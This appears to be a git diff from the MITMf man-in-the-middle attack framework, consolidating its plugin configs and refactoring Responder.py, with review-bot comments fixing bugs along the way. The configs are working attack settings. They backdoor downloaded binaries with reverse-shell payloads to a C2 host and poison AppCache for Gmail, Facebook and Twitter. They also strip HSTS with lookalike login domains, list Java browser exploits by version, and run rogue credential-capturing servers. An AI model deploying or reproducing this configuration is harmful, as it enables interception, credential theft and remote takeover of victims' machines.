diff --git a/README.md b/README.md index a67fa6a..fcb70c1 100644 --- a/README.md +++ b/README.md @@ -9,6 +9,7 @@ This tool is completely based on sergio-proxy https://code.google.com/p/sergio-p Availible plugins: - Responder - LLMNR, NBT-NS and MDNS poisoner +- SSLstrip+ - Partially bypass HSTS - Spoof - Redirect traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing and modify DNS queries - BeEFAutorun - Autoruns BeEF modules based on clients OS or browser type - AppCachePoison - Perform app cache poison attacks diff --git a/config/app_cache_poison.cfg b/config/app_cache_poison.cfg deleted file mode 100644 index cd23bc3..0000000 --- a/config/app_cache_poison.cfg +++ /dev/null 
@@ -1,53 +0,0 @@ -[DEFAULT] -; HTML5 AppCache poisioning attack -; see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack. -; generic settings for tampering engine - -templates_path=config/app_cache_poison_templates -;enable_only_in_useragents=Chrome|Firefox - -; when visiting first url matching following expression we will embed iframes with all tamper URLs -;(to poison the cache for all of them all at once) -mass_poison_url_match=http://.*prezydent\.pl.* -; it's only useful to mass poison chrome because: -; - it supports iframe sandbox preventing framebusting -; - does not ask for confirmation -mass_poison_useragent_match=Chrome|Safari - -[test] -; any //example.com URL redirects to iana and will display our spoofed content -tamper_url=http://example.com/ -manifest_url=http://www.iana.org/robots.txt ;use existing static URL that is rarely seen by the browser user, but exists on the server (no 404!) -templates=test ; which templates to use for spoofing content? 
-skip_in_mass_poison=1 - -; use absolute URLs - system tracks 30x redirects, so you can put any URL that belongs to the redirection loop here -[gmail] -tamper_url=http://mail.google.com/mail/ -; manifest has to be of last domain in redirect loop -manifest_url=http://mail.google.com/robots.txt -templates=default ; could be omitted - -[facebook] -tamper_url=http://www.facebook.com/ -manifest_url=http://www.facebook.com/robots.txt -templates=facebook ; use different template - -[twitter] -tamper_url=http://twitter.com/ -;tamper_url_match=^http://(www\.)?twitter\.com/$ -manifest_url=http://twitter.com/robots.txt - -[testing] -tamper_url=http://www.html5rocks.com/en/ -manifest_url=http://www.html5rocks.com/robots.txt - -; we can also modify non-HTML URLs to append malicious code to them -; but for them to be cached in HTML5 AppCache they need to be referred in -; manifest for a poisoned domain -; if not, they are "only" cached for 10 years :D -[ga] -raw_url=http://www.google-analytics.com/ga.js -templates=script -skip_in_mass_poison=1 -;you can add other scripts in additional sections like jQuery etc. \ No newline at end of file diff --git a/config/beefautorun.cfg b/config/beefautorun.cfg deleted file mode 100644 index fa84f2d..0000000 --- a/config/beefautorun.cfg +++ /dev/null 
@@ -1,32 +0,0 @@ -#Example config file for the BeefAutorun plugin - -mode = oneshot -#can be set to loop, or oneshot - -#in loop mode the plugin will run modules on all hooked browsers every 10 seconds -#in oneshot mode the plugin will run modules only once per hooked browser - -[ALL] #Runs specified modules on all hooked browsers - -'Man-In-The-Browser'= '{}' - - -[targets] #Runs specified modules based on OS and Browser type - - [[Windows]] #Target all Windows versions using Firefox and Internet Explorer - - [[[FF]]] - 'Fake Notification Bar (Firefox)' = '{"url": "http://example.com/payload", "notification_text": "Click this if you dare"}' - - [[[IE]]] - 'Fake Notification Bar (IE)' = '{"notification_text": "Click this if you dare"}' - - [[Windows 7]] #Target only Windows 7 using Chrome - - [[[C]]] - 'Fake Notification Bar (Chrome)' = '{"url": "http://example.com/payload", "notification_text: "Click this if you dare"}' - - [[Linux]] #Target Linux platforms using Chrome - - [[[C]]] - 'Redirect Browser (Rickroll)' = '{}' \ No newline at end of file diff --git a/config/dhcp.cfg b/config/dhcp.cfg deleted file mode 100644 index ed4417c..0000000 --- a/config/dhcp.cfg +++ /dev/null @@ -1,4 +0,0 @@ -#Example config file for DHCP spoofing -ip_pool = 192.168.2.10-50 -subnet = 255.255.255.0 -dns_server = 192.168.2.20 #optional diff --git a/config/dns.cfg b/config/dns.cfg deleted file mode 100644 index 816f218..0000000 --- a/config/dns.cfg +++ /dev/null @@ -1,3 +0,0 @@ -#Example config file for DNS tampering -www.facebook.com = 192.168.10.1 -google.com = 192.168.10.1 diff --git a/config/filepwn.cfg b/config/filepwn.cfg deleted file mode 100644 index 929ad64..0000000 --- a/config/filepwn.cfg +++ /dev/null 
@@ -1,122 +0,0 @@ -""" - BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something' - - Author Joshua Pitts the.midnite.runr 'at' gmail com - - Copyright (c) 2013-2014, Joshua Pitts - All rights reserved. - - Redistribution and use in source and binary forms, with or without modification, - are permitted provided that the following conditions are met: - - 1. Redistributions of source code must retain the above copyright notice, - this list of conditions and the following disclaimer. - - 2. Redistributions in binary form must reproduce the above copyright notice, - this list of conditions and the following disclaimer in the documentation - and/or other materials provided with the distribution. - - 3. Neither the name of the copyright holder nor the names of its contributors - may be used to endorse or promote products derived from this software without - specific prior written permission. - - THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE - ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE - LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR - CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF - SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS - INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN - CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) - ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE - POSSIBILITY OF SUCH DAMAGE. - - Tested on Kali-Linux. 
- -""" - -[ZIP] -# patchCount is the max number of files to patch in a zip file -# After the max is reached it will bypass the rest of the files -# and send on it's way - -patchCount = 5 - -# In Bytes -maxSize = 40000000 - -blacklist = .dll, #don't do dlls in a zip file - -[TAR] -# patchCount is the max number of files to patch in a tar file -# After the max is reached it will bypass the rest of the files -# and send on it's way - -patchCount = 5 - -# In Bytes -maxSize = 40000000 - -blacklist = , # a comma is null do not leave blank - -[targets] - #MAKE SURE that your settings for host and port DO NOT - # overlap between different types of payloads - - [[ALL]] # DEFAULT settings for all targets REQUIRED - - LinuxType = ALL # choices: x86/x64/ALL/None - WindowsType = ALL # choices: x86/x64/ALL/None - FatPriority = x64 # choices: x86 or x64 - - FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large - - CompressedFiles = True #True/False - [[[LinuxIntelx86]]] - SHELL = reverse_shell_tcp # This is the BDF syntax - HOST = 192.168.1.168 # The C2 - PORT = 8888 - SUPPLIED_SHELLCODE = None - MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax - - [[[LinuxIntelx64]]] - SHELL = reverse_shell_tcp - HOST = 192.168.1.16 - PORT = 9999 - SUPPLIED_SHELLCODE = None - MSFPAYLOAD = linux/x64/shell_reverse_tcp - - [[[WindowsIntelx86]]] - PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND - HOST = 192.168.1.16 - PORT = 8443 - SHELL = reverse_shell_tcp - SUPPLIED_SHELLCODE = None - ZERO_CERT = False - PATCH_DLL = True - MSFPAYLOAD = windows/shell_reverse_tcp - - [[[WindowsIntelx64]]] - PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND - HOST = 192.168.1.16 - PORT = 8088 - SHELL = reverse_shell_tcp - SUPPLIED_SHELLCODE = Nonepatchpatchpatch - ZERO_CERT = True - PATCH_DLL = False - MSFPAYLOAD = windows/x64/shell_reverse_tcp - - [[[MachoIntelx86]]] - SHELL = reverse_shell_tcp - HOST = 192.168.1.16 - PORT = 4444 - SUPPLIED_SHELLCODE = None - MSFPAYLOAD = linux/x64/shell_reverse_tcp - - 
[[[MachoIntelx64]]] - SHELL = reverse_shell_tcp - HOST = 192.168.1.16 - PORT = 5555 - SUPPLIED_SHELLCODE = None - MSFPAYLOAD = linux/x64/shell_reverse_tcp \ No newline at end of file diff --git a/config/hsts_bypass.cfg b/config/hsts_bypass.cfg deleted file mode 100644 index 06d1ece..0000000 --- a/config/hsts_bypass.cfg +++ /dev/null @@ -1,11 +0,0 @@ -#here you can configure your domains to bypass HSTS on -#the format is real.domain.com = fake.domain.com - -#for google and gmail -accounts.google.com = account.google.com -mail.google.com = gmail.google.com -accounts.google.se = cuentas.google.se - -#for facebook -www.facebook.com = social.facebook.com -facebook.com = social.facebook.com \ No newline at end of file diff --git a/config/javapwn.cfg b/config/javapwn.cfg deleted file mode 100644 index b11dc85..0000000 --- a/config/javapwn.cfg +++ /dev/null 
@@ -1,27 +0,0 @@ -# All versions strings without a * are considered vulnerable if clients Java version is <= update version -# When adding more exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28 - -[Multi] #Cross platform exploits, yay java! <3 - -multi/browser/java_rhino = 1.6.0.28, 1.7.0.28 -multi/browser/java_calendar_deserialize = 1.6.0.10, 1.5.0.16 -multi/browser/java_getsoundbank_bof = 1.6.0.16, 1.5.0.21, 1.4.2.23, 1.3.1.26 -multi/browser/java_atomicreferencearray = 1.6.0.30, 1.5.0.33, 1.7.0.2 -multi/browser/java_jre17_exec = 1.7.0.6 -multi/browser/java_jre17_jaxws = 1.7.0.7 -multi/browser/java_jre17_jmxbean = 1.7.0.10 -multi/browser/java_jre17_jmxbean_2 = 1.7.0.11 -multi/browser/java_jre17_reflection_types = 1.7.0.17 -multi/browser/java_verifier_field_access = 1.7.0.4, 1.6.0.32, 1.5.0.35, 1.4.2.37 -multi/browser/java_jre17_glassfish_averagerangestatisticimpl = 1.7.0.7 -multi/browser/java_jre17_method_handle = 1.7.0.7 -multi/browser/java_jre17_driver_manager = 1.7.0.17 -multi/browser/java_jre17_provider_skeleton = 1.7.0.21 -multi/browser/java_storeimagearray = 1.7.0.21 -multi/browser/java_setdifficm_bof = *1.6.0.16, *1.6.0.11 - -[Windows] #These are windows specific - -windows/browser/java_ws_double_quote = 1.6.0.35, 1.7.0.7 -windows/browser/java_cmm = 1.6.0.41, 1.7.0.15 -windows/browser/java_mixer_sequencer = 1.6.0.18 diff --git a/config/mitmf.cfg b/config/mitmf.cfg index a42c7fc..f28dc12 100644 --- a/config/mitmf.cfg +++ b/config/mitmf.cfg 
@@ -1,10 +1,355 @@ -[BeEF] -beefip = 127.0.0.1 -beefport = 3000 -user = beef -pass = beef +#MITMf configuration -[Metasploit] -msfport = 8080 #Port to start webserver for exploits -rpcip = 127.0.0.1 -rpcpass = abc123 \ No newline at end of file +[MITMf] + + #here you can set the arguments to pass to MITMf when it starts so all you need to do is run ```python mitmf.py``` (assuming you config file is in the default directory) + args='' + + #Required BeEF and Metasploit options + [[BeEF]] + beefip = 127.0.0.1 + beefport = 3000 + user = beef + pass = beef + + [[Metasploit]] + msfport = 8080 #Port to start webserver for exploits + rpcip = 127.0.0.1 + rpcpass = abc123 + +#-----------------------------------------------------------------------------------------------------------------------------------------# + +#Plugin configuration starts here + +[Spoof] + + [[DHCP]] + ip_pool = 192.168.2.10-50 + subnet = 255.255.255.0 + dns_server = 192.168.2.20 #optional + + [[DNS]] + www.facebook.com = 192.168.10.1 + google.com = 192.168.10.1 + + +[Responder] + + #Set these values to On or Off, so you can control which rogue authentication server is turned on. + SQL = On + SMB = On + Kerberos = On + FTP = On + POP = On + ##Listen on 25/TCP, 587/TCP + SMTP = On + IMAP = On + HTTP = On + HTTPS = On + DNS = On + LDAP = On + + #Set a custom challenge + Challenge = 1122334455667788 + + #Set this to change the default logging file + SessionLog = Responder-Session.log + + #Set this option with your in-scope targets (default = All). Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119 + #RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119 + RespondTo = + #Set this option with specific NBT-NS/LLMNR names to answer to (default = All). 
Example: RespondTo = WPAD,DEV,PROD,SQLINT + #RespondTo = WPAD,DEV,PROD,SQLINT + RespondToName = + + #DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119 + DontRespondTo = + #Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS + DontRespondToName = + + [[HTTP Server]] + + #Set this to On if you want to always serve a specific file to the victim. + Serve-Always = Off + + #Set this to On if you want to serve an executable file each time a .exe is detected in an URL. + Serve-Exe = Off + + #Uncomment and specify a custom file to serve, the file must exist. + Filename = config/responder/Denied.html + + #Specify a custom executable file to serve, the file must exist. + ExecFilename = config/responder/FixInternet.exe + + #Set your custom PAC script + WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return "PROXY ISAProxySrv:3141; DIRECT";}' + + [[HTTPS Server]] + + #Change to use your certs + cert = config/responder/certs/responder.crt + key = config/responder/certs/responder.key + + +[BeEFAutorun] + #Example config for the BeefAutorun plugin + + mode = oneshot + #can be set to loop, or oneshot + + #in loop mode the plugin will run modules on all hooked browsers every 10 seconds + #in oneshot mode the plugin will run modules only once per hooked browser + + [[ALL]] #Runs specified modules on all hooked browsers + + 'Man-In-The-Browser'= '{}' + + [[targets]] #Runs specified modules based on OS and Browser type + + [[[Windows]]] #Target all Windows versions using Firefox and Internet Explorer + + [[[[FF]]]] + 'Fake Notification Bar (Firefox)' = '{"url": "http://example.com/payload", "notification_text": "Click this if you dare"}' + + [[[[IE]]]] + 'Fake 
Notification Bar (IE)' = '{"notification_text": "Click this if you dare"}' + + [[[Windows 7]]] #Target only Windows 7 using Chrome + + [[[[C]]]] + 'Fake Notification Bar (Chrome)' = '{"url": "http://example.com/payload", "notification_text: "Click this if you dare"}' + + [[[Linux]]] #Target Linux platforms using Chrome + + [[[[C]]]] + 'Redirect Browser (Rickroll)' = '{}' + +[AppCachePoison] + # HTML5 AppCache poisioning attack + # see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack. + # generic settings for tampering engine + + #enable_only_in_useragents=Chrome|Firefox + + templates_path=config/app_cache_poison_templates + + # when visiting first url matching following expression we will embed iframes with all tamper URLs + #(to poison the cache for all of them all at once) + + mass_poison_url_match=http://.*prezydent\.pl.* + + # it's only useful to mass poison chrome because: + # - it supports iframe sandbox preventing framebusting + # - does not ask for confirmation + + mass_poison_useragent_match=Chrome|Safari + + [[test]] + # any //example.com URL redirects to iana and will display our spoofed content + + tamper_url=http://example.com/ + manifest_url=http://www.iana.org/robots.txt #use existing static URL that is rarely seen by the browser user, but exists on the server (no 404!) + templates=test # which templates to use for spoofing content? 
+ skip_in_mass_poison=1 + + [[gmail]] + #use absolute URLs - system tracks 30x redirects, so you can put any URL that belongs to the redirection loop here + + tamper_url=http://mail.google.com/mail/ + + # manifest has to be of last domain in redirect loop + + manifest_url=http://mail.google.com/robots.txt + templates=default # could be omitted + + [[facebook]] + tamper_url=http://www.facebook.com/ + manifest_url=http://www.facebook.com/robots.txt + templates=facebook # use different template + + [[twitter]] + tamper_url=http://twitter.com/ + #tamper_url_match=^http://(www\.)?twitter\.com/$ + manifest_url=http://twitter.com/robots.txt + + [[testing]] + tamper_url=http://www.html5rocks.com/en/ + manifest_url=http://www.html5rocks.com/robots.txt + + [[ga]] + # we can also modify non-HTML URLs to append malicious code to them + # but for them to be cached in HTML5 AppCache they need to be referred in + # manifest for a poisoned domain + # if not, they are "only" cached for 10 years :D + + raw_url=http://www.google-analytics.com/ga.js + templates=script + skip_in_mass_poison=1 + #you can add other scripts in additional sections like jQuery etc. + +[JavaPwn] + # All versions strings without a * are considered vulnerable if clients Java version is <= update version + # When adding more exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28 + + [[Multi]] #Cross platform exploits, yay java! 
<3 + + multi/browser/java_rhino = 1.6.0.28, 1.7.0.28 + multi/browser/java_calendar_deserialize = 1.6.0.10, 1.5.0.16 + multi/browser/java_getsoundbank_bof = 1.6.0.16, 1.5.0.21, 1.4.2.23, 1.3.1.26 + multi/browser/java_atomicreferencearray = 1.6.0.30, 1.5.0.33, 1.7.0.2 + multi/browser/java_jre17_exec = 1.7.0.6 + multi/browser/java_jre17_jaxws = 1.7.0.7 + multi/browser/java_jre17_jmxbean = 1.7.0.10 + multi/browser/java_jre17_jmxbean_2 = 1.7.0.11 + multi/browser/java_jre17_reflection_types = 1.7.0.17 + multi/browser/java_verifier_field_access = 1.7.0.4, 1.6.0.32, 1.5.0.35, 1.4.2.37 + multi/browser/java_jre17_glassfish_averagerangestatisticimpl = 1.7.0.7 + multi/browser/java_jre17_method_handle = 1.7.0.7 + multi/browser/java_jre17_driver_manager = 1.7.0.17 + multi/browser/java_jre17_provider_skeleton = 1.7.0.21 + multi/browser/java_storeimagearray = 1.7.0.21 + multi/browser/java_setdifficm_bof = *1.6.0.16, *1.6.0.11 + + [[Windows]] #These are windows specific + + windows/browser/java_ws_double_quote = 1.6.0.35, 1.7.0.7 + windows/browser/java_cmm = 1.6.0.41, 1.7.0.15 + windows/browser/java_mixer_sequencer = 1.6.0.18 + +[SSLstrip+] + #here you can configure your domains to bypass HSTS on + #the format is real.domain.com = fake.domain.com + + #for google and gmail + accounts.google.com = account.google.com + mail.google.com = gmail.google.com + accounts.google.se = cuentas.google.se + + #for facebook + www.facebook.com = social.facebook.com + facebook.com = social.facebook.com + +#-----------------------------------------------------------------------------------------------------------------------------------------# + +# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something' +# +# Author Joshua Pitts the.midnite.runr 'at' gmail com +# +# Copyright (c) 2013-2014, Joshua Pitts +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without modification, +# are permitted provided that the following conditions are met: +# +# 1. 
Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# +# 2. Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# +# 3. Neither the name of the copyright holder nor the names of its contributors +# may be used to endorse or promote products derived from this software without +# specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE +# POSSIBILITY OF SUCH DAMAGE. +# +# Tested on Kali-Linux. 
+ +#-----------------------------------------------------------------------------------------------------------------------------------------# + +[FilePwn] + [[ZIP]] + # patchCount is the max number of files to patch in a zip file + # After the max is reached it will bypass the rest of the files + # and send on it's way + + patchCount = 5 + + # In Bytes + maxSize = 40000000 + + blacklist = .dll, #don't do dlls in a zip file + + [[TAR]] + # patchCount is the max number of files to patch in a tar file + # After the max is reached it will bypass the rest of the files + # and send on it's way + + patchCount = 5 + + # In Bytes + maxSize = 40000000 + + blacklist = , # a comma is null do not leave blank + + [[targets]] + #MAKE SURE that your settings for host and port DO NOT + # overlap between different types of payloads + + [[[ALL]]] # DEFAULT settings for all targets REQUIRED + + LinuxType = ALL # choices: x86/x64/ALL/None + WindowsType = ALL # choices: x86/x64/ALL/None + FatPriority = x64 # choices: x86 or x64 + + FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large + + CompressedFiles = True #True/False + [[[[LinuxIntelx86]]]] + SHELL = reverse_shell_tcp # This is the BDF syntax + HOST = 192.168.1.168 # The C2 + PORT = 8888 + SUPPLIED_SHELLCODE = None + MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax + + [[[[LinuxIntelx64]]]] + SHELL = reverse_shell_tcp + HOST = 192.168.1.16 + PORT = 9999 + SUPPLIED_SHELLCODE = None + MSFPAYLOAD = linux/x64/shell_reverse_tcp + + [[[[WindowsIntelx86]]]] + PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND + HOST = 192.168.1.16 + PORT = 8443 + SHELL = reverse_shell_tcp + SUPPLIED_SHELLCODE = None + ZERO_CERT = False + PATCH_DLL = True + MSFPAYLOAD = windows/shell_reverse_tcp + + [[[[WindowsIntelx64]]]] + PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND + HOST = 192.168.1.16 + PORT = 8088 + SHELL = reverse_shell_tcp + SUPPLIED_SHELLCODE = Nonepatchpatchpatch + ZERO_CERT = True + PATCH_DLL = False + MSFPAYLOAD = 
windows/x64/shell_reverse_tcp + + [[[[MachoIntelx86]]]] + SHELL = reverse_shell_tcp + HOST = 192.168.1.16 + PORT = 4444 + SUPPLIED_SHELLCODE = None + MSFPAYLOAD = linux/x64/shell_reverse_tcp + + [[[[MachoIntelx64]]]] + SHELL = reverse_shell_tcp + HOST = 192.168.1.16 + PORT = 5555 + SUPPLIED_SHELLCODE = None + MSFPAYLOAD = linux/x64/shell_reverse_tcp \ No newline at end of file diff --git a/config/replace.cfg b/config/replace.cfg deleted file mode 100644 index e69de29..0000000 diff --git a/config/responder/responder.conf b/config/responder/responder.conf deleted file mode 100644 index ed33a0e..0000000 --- a/config/responder/responder.conf +++ /dev/null 
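Review bot: The BeEFAutorun entry under `[[[[C]]]]` for `[[[Windows 7]]]` carries a malformed JSON value — `"notification_text: "Click this if you dare"` is missing the closing quote on the key — so any consumer that parses that string as JSON will reject it (the plugin that reads it is not visible here). It was copied verbatim from the deleted config/beefautorun.cfg, and this consolidation is the place to fix it: `'Fake Notification Bar (Chrome)' = '{"url": "http://example.com/payload", "notification_text": "Click this if you dare"}'`. `SUPPLIED_SHELLCODE = Nonepatchpatchpatch` under `[[[[WindowsIntelx64]]]]` likewise differs from every sibling's `None` and looks like an editing accident carried over from config/filepwn.cfg; `SUPPLIED_SHELLCODE = None` would match the rest. The file also now concentrates the `rpcpass`, BeEF `user`/`pass` and Responder `Challenge` defaults in one place, and a comment stating that these are example values to be replaced before use would help anyone who copies the file as-is.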
@@ -1,59 +0,0 @@ -[Responder Core] -;; -;Set these values to On or Off, so you can control which rogue authentication server is turned on. -SQL = On -SMB = On -Kerberos = On -FTP = On -POP = On -;;Listen on 25/TCP, 587/TCP -SMTP = On -IMAP = On -HTTP = On -HTTPS = On -DNS = On -LDAP = On -; -;Set a custom challenge -Challenge = 1122334455667788 -; -;Set this to change the default logging file -SessionLog = Responder-Session.log -; -;Set this option with your in-scope targets (default = All). Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119 -;RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119 -RespondTo = -;Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT -;RespondTo = WPAD,DEV,PROD,SQLINT -RespondToName = -; -;DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119 -DontRespondTo = -;Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS -DontRespondToName = -; -[HTTP Server] -;; -;Set this to On if you want to always serve a specific file to the victim. -Serve-Always = Off -; -;Set this to On if you want to serve an executable file each time a .exe is detected in an URL. -Serve-Exe = Off -; -;Uncomment and specify a custom file to serve, the file must exist. -Filename = config/responder/Denied.html -; -;Specify a custom executable file to serve, the file must exist. 
-ExecFilename = config/responder/FixInternet.exe
-;
-;Set your custom PAC script
-WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
-;
-[HTTPS Server]
-;
-;Change to use your certs
-cert = config/responder/certs/responder.crt
-key = config/responder/certs/responder.key
-;
-
-
diff --git a/libs/responder/Responder.py b/libs/responder/Responder.py
index e5a6370..4bebcac 100755
--- a/libs/responder/Responder.py
+++ b/libs/responder/Responder.py
@@ -16,7 +16,7 @@
 # You should have received a copy of the GNU General Public License
 # along with this program. If not, see .
-import sys,struct,SocketServer,re,socket,thread,Fingerprint,random,os,ConfigParser,BaseHTTPServer, select,urlparse,zlib, string, time
+import sys,struct,SocketServer,re,socket,thread,Fingerprint,random,os,BaseHTTPServer, select,urlparse,zlib, string, time
 from SocketServer import TCPServer, UDPServer, ThreadingMixIn, StreamRequestHandler, BaseRequestHandler,BaseServer
 from Fingerprint import RunSmbFinger,OsNameClientVersion
 from odict import OrderedDict
@@ -24,45 +24,6 @@ from socket import inet_aton
 from random import randrange
 from libs.sslstrip.DnsCache import DnsCache
-VERSION = '2.1.2'
-
-#Config parsing
-config = ConfigParser.ConfigParser()
-config.read("./config/responder/responder.conf")
-
-# Set some vars.
-On_Off = config.get('Responder Core', 'HTTP').upper()
-SSL_On_Off = config.get('Responder Core', 'HTTPS').upper()
-SMB_On_Off = config.get('Responder Core', 'SMB').upper()
-SQL_On_Off = config.get('Responder Core', 'SQL').upper()
-FTP_On_Off = config.get('Responder Core', 'FTP').upper()
-POP_On_Off = config.get('Responder Core', 'POP').upper()
-IMAP_On_Off = config.get('Responder Core', 'IMAP').upper()
-SMTP_On_Off = config.get('Responder Core', 'SMTP').upper()
-LDAP_On_Off = config.get('Responder Core', 'LDAP').upper()
-DNS_On_Off = config.get('Responder Core', 'DNS').upper()
-Krb_On_Off = config.get('Responder Core', 'Kerberos').upper()
-NumChal = config.get('Responder Core', 'Challenge')
-SessionLog = config.get('Responder Core', 'SessionLog')
-Exe_On_Off = config.get('HTTP Server', 'Serve-Exe').upper()
-Exec_Mode_On_Off = config.get('HTTP Server', 'Serve-Always').upper()
-FILENAME = config.get('HTTP Server', 'Filename')
-WPAD_Script = config.get('HTTP Server', 'WPADScript')
-#HTMLToServe = config.get('HTTP Server', 'HTMLToServe')
-RespondTo = config.get('Responder Core', 'RespondTo').strip()
-RespondTo.split(",")
-RespondToName = config.get('Responder Core', 'RespondToName').strip()
-RespondToName.split(",")
-DontRespondTo = config.get('Responder Core', 'DontRespondTo').strip()
-DontRespondTo.split(",")
-DontRespondToName = config.get('Responder Core', 'DontRespondToName').strip()
-DontRespondToName.split(",")
-
-HTMLToServe = ''
-
-if len(NumChal) is not 16:
-    sys.exit("[-] The challenge must be exactly 16 chars long.\nExample: -c 1122334455667788\n")
-
 def IsOsX():
     Os_version = sys.platform
     if Os_version == "darwin":
@@ -151,11 +112,6 @@ def PrintLLMNRNBTNS(outfile,Message):
     return True
-# Break out challenge for the hexidecimally challenged. Also, avoid 2 different challenges by accident.
-Challenge = ""
-for i in range(0,len(NumChal),2):
-    Challenge += NumChal[i:i+2].decode("hex")
-
 #Packet class handling all packet generation (see odict.py).
 class Packet():
     fields = OrderedDict([
@@ -2021,8 +1977,8 @@ class SSlSock(ThreadingMixIn, TCPServer):
     def __init__(self, server_address, RequestHandlerClass):
         BaseServer.__init__(self, server_address, RequestHandlerClass)
         ctx = SSL.Context(SSL.SSLv3_METHOD)
-        cert = config.get('HTTPS Server', 'cert')
-        key = config.get('HTTPS Server', 'key')
+        cert = SSLcert
+        key = SSLkey
         ctx.use_privatekey_file(key)
         ctx.use_certificate_file(cert)
         self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
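Review bot: `cert = SSLcert` and `key = SSLkey` read module globals that are only bound inside `start_responder` (a later hunk of this commit), so constructing `SSlSock` before that call now fails with a `NameError` rather than a clear configuration error. A comment on these two lines, `# SSLcert/SSLkey are bound by start_responder(); do not instantiate this class before it runs`, would document the ordering dependency, and passing the two paths into the constructor would remove it altogether. `SSlSock.__init__` continues outside the hunk.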
@@ -2483,7 +2439,51 @@ def serve_thread_SSL(host, port, handler):
     except Exception, e:
         print "[-] Error starting TCP server on port " + str(port) + ": " + str(e)
-def start_responder(options, ip_address):
+def start_responder(options, ip_address, config):
+
+    global VERSION; VERSION = '2.1.2'
+
+    # Set some vars.
+    global On_Off; On_Off = config['HTTP'].upper()
+    global SSL_On_Off; SSL_On_Off = config['HTTPS'].upper()
+    global SMB_On_Off; SMB_On_Off = config['SMB'].upper()
+    global SQL_On_Off; SQL_On_Off = config['SQL'].upper()
+    global FTP_On_Off; FTP_On_Off = config['FTP'].upper()
+    global POP_On_Off; POP_On_Off = config['POP'].upper()
+    global IMAP_On_Off; IMAP_On_Off = config['IMAP'].upper()
+    global SMTP_On_Off; SMTP_On_Off = config['SMTP'].upper()
+    global LDAP_On_Off; LDAP_On_Off = config['LDAP'].upper()
+    global DNS_On_Off; DNS_On_Off = config['DNS'].upper()
+    global Krb_On_Off; Krb_On_Off = config['Kerberos'].upper()
+    global NumChal; NumChal = config['Challenge']
+    global SessionLog; SessionLog = config['SessionLog']
